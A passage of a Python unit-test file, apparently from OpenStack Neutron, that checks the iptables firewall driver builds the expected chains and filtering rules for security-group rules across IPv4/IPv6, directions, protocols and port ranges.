self._dev_zone_map = {'61634509-31': 2, '8f46cf18-12': 9,
'95c24827-02': 2, 'e804433b-61': 1}
get_rules_for_table_func = lambda x: RAW_TABLE_OUTPUT.split('\n')
filtered_ports = {port_id: self._fake_port()
for port_id in self._dev_zone_map}
self.firewall.ipconntrack = ip_conntrack.IpConntrackManager(
get_rules_for_table_func, filtered_ports=filtered_ports,
unfiltered_ports=dict())
self.firewall.ipconntrack._device_zone_map = self._dev_zone_map
def _fake_port(self):
return {'device': 'tapfake_dev',
'mac_address': 'ff:ff:ff:ff:ff:ff',
'network_id': 'fake_net',
'fixed_ips': [FAKE_IP['IPv4'],
FAKE_IP['IPv6']]}
class IptablesFirewallTestCase(BaseIptablesFirewallTestCase):
def test_prepare_port_filter_with_no_sg(self):
port = self._fake_port()
self.firewall.prepare_port_filter(port)
calls = [mock.call.add_chain('sg-fallback'),
mock.call.add_rule(
'sg-fallback', '-j DROP',
comment=ic.UNMATCH_DROP),
mock.call.add_chain('sg-chain'),
mock.call.add_rule('PREROUTING', mock.ANY, # zone set
comment=None),
mock.call.add_rule('PREROUTING', mock.ANY, # zone set
comment=None),
mock.call.add_rule('PREROUTING', mock.ANY, # zone set
comment=None),
mock.call.add_chain('ifake_dev'),
mock.call.add_rule('FORWARD',
'-m physdev --physdev-out tapfake_dev '
'--physdev-is-bridged '
'-j $sg-chain', comment=ic.VM_INT_SG),
mock.call.add_rule('sg-chain',
'-m physdev --physdev-out tapfake_dev '
'--physdev-is-bridged '
'-j $ifake_dev',
comment=ic.SG_TO_VM_SG),
mock.call.add_rule(
'ifake_dev',
'-m state --state RELATED,ESTABLISHED -j RETURN',
comment=None),
mock.call.add_rule(
'ifake_dev',
'-m state --state INVALID -j DROP',
comment=None),
mock.call.add_rule(
'ifake_dev',
'-j $sg-fallback', comment=None),
mock.call.add_chain('ofake_dev'),
mock.call.add_rule('FORWARD',
'-m physdev --physdev-in tapfake_dev '
'--physdev-is-bridged '
'-j $sg-chain', comment=ic.VM_INT_SG),
mock.call.add_rule('sg-chain',
'-m physdev --physdev-in tapfake_dev '
'--physdev-is-bridged -j $ofake_dev',
comment=ic.SG_TO_VM_SG),
mock.call.add_rule('INPUT',
'-m physdev --physdev-in tapfake_dev '
'--physdev-is-bridged -j $ofake_dev',
comment=ic.INPUT_TO_SG),
mock.call.add_chain('sfake_dev'),
mock.call.add_rule(
'sfake_dev',
'-s 10.0.0.1/32 -m mac --mac-source FF:FF:FF:FF:FF:FF '
'-j RETURN',
comment=ic.PAIR_ALLOW),
mock.call.add_rule(
'sfake_dev', '-j DROP',
comment=ic.PAIR_DROP),
mock.call.add_rule(
'ofake_dev',
'-s 0.0.0.0/32 -d 255.255.255.255/32 -p udp -m udp '
'--sport 68 --dport 67 -j RETURN',
comment=None),
mock.call.add_rule('ofake_dev', '-j $sfake_dev',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-p udp -m udp --sport 68 --dport 67 -j RETURN',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-p udp -m udp --sport 67 --dport 68 -j DROP',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-m state --state RELATED,ESTABLISHED -j RETURN',
comment=None),
mock.call.add_rule(
'ofake_dev',
'-m state --state INVALID -j DROP', comment=None),
mock.call.add_rule(
'ofake_dev',
'-j $sg-fallback',
comment=None),
mock.call.add_rule('sg-chain', '-j ACCEPT')]
self.v4filter_inst.assert_has_calls(calls)
def test_filter_ipv4_ingress(self):
rule = {'ethertype': 'IPv4',
'direction': 'ingress'}
ingress = mock.call.add_rule('ifake_dev', '-j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'source_ip_prefix': prefix}
ingress = mock.call.add_rule(
'ifake_dev', '-s %s -j RETURN' % prefix, comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_tcp(self):
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'tcp'}
ingress = mock.call.add_rule(
'ifake_dev', '-p tcp -j RETURN', comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_tcp_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'tcp',
'source_ip_prefix': prefix}
ingress = mock.call.add_rule('ifake_dev',
'-s %s -p tcp -j RETURN' % prefix,
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_icmp(self):
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'icmp'}
ingress = mock.call.add_rule('ifake_dev', '-p icmp -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_icmp_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'icmp',
'source_ip_prefix': prefix}
ingress = mock.call.add_rule(
'ifake_dev', '-s %s -p icmp -j RETURN' % prefix,
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_tcp_port(self):
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 10}
ingress = mock.call.add_rule('ifake_dev',
'-p tcp -m tcp --dport 10 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_tcp_mport(self):
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 100}
ingress = mock.call.add_rule(
'ifake_dev',
'-p tcp -m tcp -m multiport --dports 10:100 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_tcp_mport_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 100,
'source_ip_prefix': prefix}
ingress = mock.call.add_rule(
'ifake_dev',
'-s %s -p tcp -m tcp -m multiport --dports 10:100 '
'-j RETURN' % prefix, comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_udp(self):
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'udp'}
ingress = mock.call.add_rule(
'ifake_dev', '-p udp -j RETURN', comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_udp_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'udp',
'source_ip_prefix': prefix}
ingress = mock.call.add_rule('ifake_dev',
'-s %s -p udp -j RETURN' % prefix,
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_udp_port(self):
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 10}
ingress = mock.call.add_rule('ifake_dev',
'-p udp -m udp --dport 10 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_udp_mport(self):
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 100}
ingress = mock.call.add_rule(
'ifake_dev',
'-p udp -m udp -m multiport --dports 10:100 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_udp_mport_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 100,
'source_ip_prefix': prefix}
ingress = mock.call.add_rule(
'ifake_dev',
'-s %s -p udp -m udp -m multiport --dports 10:100 '
'-j RETURN' % prefix, comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_dccp_port(self):
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'dccp',
'port_range_min': 10,
'port_range_max': 10}
ingress = mock.call.add_rule('ifake_dev',
'-p dccp -m dccp --dport 10 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_ingress_sctp_port(self):
rule = {'ethertype': 'IPv4',
'direction': 'ingress',
'protocol': 'sctp',
'port_range_min': 10,
'port_range_max': 10}
ingress = mock.call.add_rule('ifake_dev',
'-p sctp -m sctp --dport 10 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress(self):
rule = {'ethertype': 'IPv4',
'direction': 'egress'}
egress = mock.call.add_rule('ofake_dev', '-j RETURN', comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_dest_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev', '-d %s -j RETURN' % prefix, comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_source_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'source_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev', '-s %s -j RETURN' % prefix, comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_tcp(self):
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'tcp'}
egress = mock.call.add_rule(
'ofake_dev', '-p tcp -j RETURN', comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_tcp_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'tcp',
'dest_ip_prefix': prefix}
egress = mock.call.add_rule('ofake_dev',
'-d %s -p tcp -j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_icmp(self):
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'icmp'}
egress = mock.call.add_rule('ofake_dev', '-p icmp -j RETURN',
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_icmp_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'icmp',
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev', '-d %s -p icmp -j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_icmp_type(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'icmp',
'port_range_min': 8,
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev',
'-d %s -p icmp -m icmp --icmp-type 8 -j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_icmp_type_name(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'icmp',
'port_range_min': 'echo-request',
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev',
'-d %s -p icmp -m icmp --icmp-type echo-request '
'-j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_icmp_type_code(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'icmp',
'port_range_min': 8,
'port_range_max': 0,
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev',
'-d %s -p icmp -m icmp --icmp-type 8/0 -j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_tcp_port(self):
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 10}
egress = mock.call.add_rule('ofake_dev',
'-p tcp -m tcp --dport 10 -j RETURN',
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_tcp_mport(self):
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 100}
egress = mock.call.add_rule(
'ofake_dev',
'-p tcp -m tcp -m multiport --dports 10:100 -j RETURN',
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_tcp_mport_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 100,
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev',
'-d %s -p tcp -m tcp -m multiport --dports 10:100 '
'-j RETURN' % prefix, comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_udp(self):
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'udp'}
egress = mock.call.add_rule(
'ofake_dev', '-p udp -j RETURN', comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_udp_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'udp',
'dest_ip_prefix': prefix}
egress = mock.call.add_rule('ofake_dev',
'-d %s -p udp -j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_udp_port(self):
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 10}
egress = mock.call.add_rule('ofake_dev',
'-p udp -m udp --dport 10 -j RETURN',
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_udp_mport(self):
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 100}
egress = mock.call.add_rule(
'ofake_dev',
'-p udp -m udp -m multiport --dports 10:100 -j RETURN',
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv4_egress_udp_mport_prefix(self):
prefix = FAKE_PREFIX['IPv4']
rule = {'ethertype': 'IPv4',
'direction': 'egress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 100,
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev',
'-d %s -p udp -m udp -m multiport --dports 10:100 '
'-j RETURN' % prefix, comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress(self):
rule = {'ethertype': 'IPv6',
'direction': 'ingress'}
ingress = mock.call.add_rule('ifake_dev', '-j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'source_ip_prefix': prefix}
ingress = mock.call.add_rule(
'ifake_dev', '-s %s -j RETURN' % prefix, comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_tcp(self):
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'tcp'}
ingress = mock.call.add_rule(
'ifake_dev', '-p tcp -j RETURN', comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_tcp_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'tcp',
'source_ip_prefix': prefix}
ingress = mock.call.add_rule('ifake_dev',
'-s %s -p tcp -j RETURN' % prefix,
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_tcp_port(self):
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 10}
ingress = mock.call.add_rule('ifake_dev',
'-p tcp -m tcp --dport 10 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_icmp(self):
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'icmp'}
ingress = mock.call.add_rule(
'ifake_dev', '-p ipv6-icmp -j RETURN', comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_icmp_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'icmp',
'source_ip_prefix': prefix}
ingress = mock.call.add_rule(
'ifake_dev', '-s %s -p ipv6-icmp -j RETURN' % prefix,
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_tcp_mport(self):
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 100}
ingress = mock.call.add_rule(
'ifake_dev',
'-p tcp -m tcp -m multiport --dports 10:100 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def _test_filter_ingress_tcp_min_port_0(self, ethertype):
rule = {'ethertype': ethertype,
'direction': 'ingress',
'protocol': 'tcp',
'port_range_min': 0,
'port_range_max': 100}
ingress = mock.call.add_rule(
'ifake_dev',
'-p tcp -m tcp -m multiport --dports 0:100 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ingress_tcp_min_port_0_for_ipv4(self):
self._test_filter_ingress_tcp_min_port_0('IPv4')
def test_filter_ingress_tcp_min_port_0_for_ipv6(self):
self._test_filter_ingress_tcp_min_port_0('IPv6')
def test_filter_ipv6_ingress_tcp_mport_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 100,
'source_ip_prefix': prefix}
ingress = mock.call.add_rule(
'ifake_dev',
'-s %s -p tcp -m tcp -m multiport --dports 10:100 '
'-j RETURN' % prefix, comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_udp(self):
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'udp'}
ingress = mock.call.add_rule(
'ifake_dev', '-p udp -j RETURN', comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_udp_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'udp',
'source_ip_prefix': prefix}
ingress = mock.call.add_rule('ifake_dev',
'-s %s -p udp -j RETURN' % prefix,
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_udp_port(self):
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 10}
ingress = mock.call.add_rule('ifake_dev',
'-p udp -m udp --dport 10 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_udp_mport(self):
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 100}
ingress = mock.call.add_rule(
'ifake_dev',
'-p udp -m udp -m multiport --dports 10:100 -j RETURN',
comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_ingress_udp_mport_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'ingress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 100,
'source_ip_prefix': prefix}
ingress = mock.call.add_rule(
'ifake_dev',
'-s %s -p udp -m udp -m multiport --dports 10:100 '
'-j RETURN' % prefix, comment=None)
egress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress(self):
rule = {'ethertype': 'IPv6',
'direction': 'egress'}
egress = mock.call.add_rule('ofake_dev', '-j RETURN', comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev', '-d %s -j RETURN' % prefix, comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_tcp(self):
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'tcp'}
egress = mock.call.add_rule(
'ofake_dev', '-p tcp -j RETURN', comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_tcp_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'tcp',
'dest_ip_prefix': prefix}
egress = mock.call.add_rule('ofake_dev',
'-d %s -p tcp -j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_icmp(self):
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'icmp'}
egress = mock.call.add_rule(
'ofake_dev', '-p ipv6-icmp -j RETURN', comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_icmp_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'icmp',
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev', '-d %s -p ipv6-icmp -j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_icmp_type(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'icmp',
'port_range_min': 8,
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev',
'-d %s -p ipv6-icmp -m icmp6 --icmpv6-type 8 -j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_icmp_type_name(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'icmp',
'port_range_min': 'echo-request',
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev',
'-d %s -p ipv6-icmp -m icmp6 --icmpv6-type echo-request '
'-j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_icmp_type_code(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'icmp',
'port_range_min': 8,
'port_range_max': 0,
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev',
'-d %s -p ipv6-icmp -m icmp6 --icmpv6-type 8/0 -j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_tcp_port(self):
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 10}
egress = mock.call.add_rule('ofake_dev',
'-p tcp -m tcp --dport 10 -j RETURN',
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_tcp_mport(self):
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 100}
egress = mock.call.add_rule(
'ofake_dev',
'-p tcp -m tcp -m multiport --dports 10:100 -j RETURN',
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_tcp_mport_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'tcp',
'port_range_min': 10,
'port_range_max': 100,
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev',
'-d %s -p tcp -m tcp -m multiport --dports 10:100 '
'-j RETURN' % prefix, comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_udp(self):
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'udp'}
egress = mock.call.add_rule(
'ofake_dev', '-p udp -j RETURN', comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_udp_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'udp',
'dest_ip_prefix': prefix}
egress = mock.call.add_rule('ofake_dev',
'-d %s -p udp -j RETURN' % prefix,
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_udp_port(self):
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 10}
egress = mock.call.add_rule('ofake_dev',
'-p udp -m udp --dport 10 -j RETURN',
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_udp_mport(self):
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 100}
egress = mock.call.add_rule(
'ofake_dev',
'-p udp -m udp -m multiport --dports 10:100 -j RETURN',
comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
def test_filter_ipv6_egress_udp_mport_prefix(self):
prefix = FAKE_PREFIX['IPv6']
rule = {'ethertype': 'IPv6',
'direction': 'egress',
'protocol': 'udp',
'port_range_min': 10,
'port_range_max': 100,
'dest_ip_prefix': prefix}
egress = mock.call.add_rule(
'ofake_dev',
'-d %s -p udp -m udp -m multiport --dports 10:100 '
'-j RETURN' % prefix, comment=None)
ingress = None
self._test_prepare_port_filter(rule, ingress, egress)
    def _test_prepare_port_filter(self,
                                  rule,
                                  ingress_expected_call=None,
                                  egress_expected_call=None):
        """Prepare a port with a single SG rule and verify the iptables calls.

        Builds the full expected call sequence for the relevant address
        family (v4 or v6 filter table, chosen by the rule's ethertype),
        inserting *ingress_expected_call* / *egress_expected_call* at the
        positions where the user rule must appear.  The comparison is
        strictly ordered.
        """
        port = self._fake_port()
        ethertype = rule['ethertype']
        prefix = utils.ip_to_cidr(FAKE_IP[ethertype])
        # Defaults are for IPv4; overridden below for IPv6.
        filter_inst = self.v4filter_inst
        dhcp_rule = [mock.call.add_rule(
            'ofake_dev',
            '-s 0.0.0.0/32 -d 255.255.255.255/32 -p udp -m udp '
            '--sport 68 --dport 67 -j RETURN',
            comment=None)]
        if ethertype == 'IPv6':
            filter_inst = self.v6filter_inst
            # IPv6 has no DHCP-discovery rule; instead the allowed
            # unspecified-address ICMPv6 types are whitelisted.
            dhcp_rule = [mock.call.add_rule('ofake_dev',
                                            '-s ::/128 -d ff02::/16 '
                                            '-p ipv6-icmp -m icmp6 '
                                            '--icmpv6-type %s -j RETURN' %
                                            icmp6_type,
                                            comment=None) for icmp6_type
                         in constants.ICMPV6_ALLOWED_UNSPEC_ADDR_TYPES]
        sg = [rule]
        port['security_group_rules'] = sg
        self.firewall.prepare_port_filter(port)
        calls = [mock.call.add_chain('sg-fallback'),
                 mock.call.add_rule(
                     'sg-fallback',
                     '-j DROP',
                     comment=ic.UNMATCH_DROP),
                 mock.call.add_chain('sg-chain'),
                 mock.call.add_rule('PREROUTING', mock.ANY,  # zone set
                                    comment=None),
                 mock.call.add_rule('PREROUTING', mock.ANY,  # zone set
                                    comment=None),
                 mock.call.add_rule('PREROUTING', mock.ANY,  # zone set
                                    comment=None),
                 mock.call.add_chain('ifake_dev'),
                 mock.call.add_rule('FORWARD',
                                    '-m physdev --physdev-out tapfake_dev '
                                    '--physdev-is-bridged '
                                    '-j $sg-chain', comment=ic.VM_INT_SG),
                 mock.call.add_rule('sg-chain',
                                    '-m physdev --physdev-out tapfake_dev '
                                    '--physdev-is-bridged '
                                    '-j $ifake_dev',
                                    comment=ic.SG_TO_VM_SG)
                 ]
        if ethertype == 'IPv6':
            for icmp6_type in firewall.ICMPV6_ALLOWED_INGRESS_TYPES:
                calls.append(
                    mock.call.add_rule('ifake_dev',
                                       '-p ipv6-icmp -m icmp6 --icmpv6-type '
                                       '%s -j RETURN' %
                                       icmp6_type, comment=None))
        calls += [
            mock.call.add_rule(
                'ifake_dev',
                '-m state --state RELATED,ESTABLISHED -j RETURN',
                comment=None
            )
        ]
        # The user's ingress rule (when any) lands right after the
        # RELATED,ESTABLISHED shortcut of the ingress chain.
        if ingress_expected_call:
            calls.append(ingress_expected_call)
        calls += [mock.call.add_rule(
            'ifake_dev',
            '-m state --state INVALID -j DROP', comment=None),
            mock.call.add_rule('ifake_dev',
                               '-j $sg-fallback', comment=None),
            mock.call.add_chain('ofake_dev'),
            mock.call.add_rule('FORWARD',
                               '-m physdev --physdev-in tapfake_dev '
                               '--physdev-is-bridged '
                               '-j $sg-chain', comment=ic.VM_INT_SG),
            mock.call.add_rule('sg-chain',
                               '-m physdev --physdev-in tapfake_dev '
                               '--physdev-is-bridged -j $ofake_dev',
                               comment=ic.SG_TO_VM_SG),
            mock.call.add_rule('INPUT',
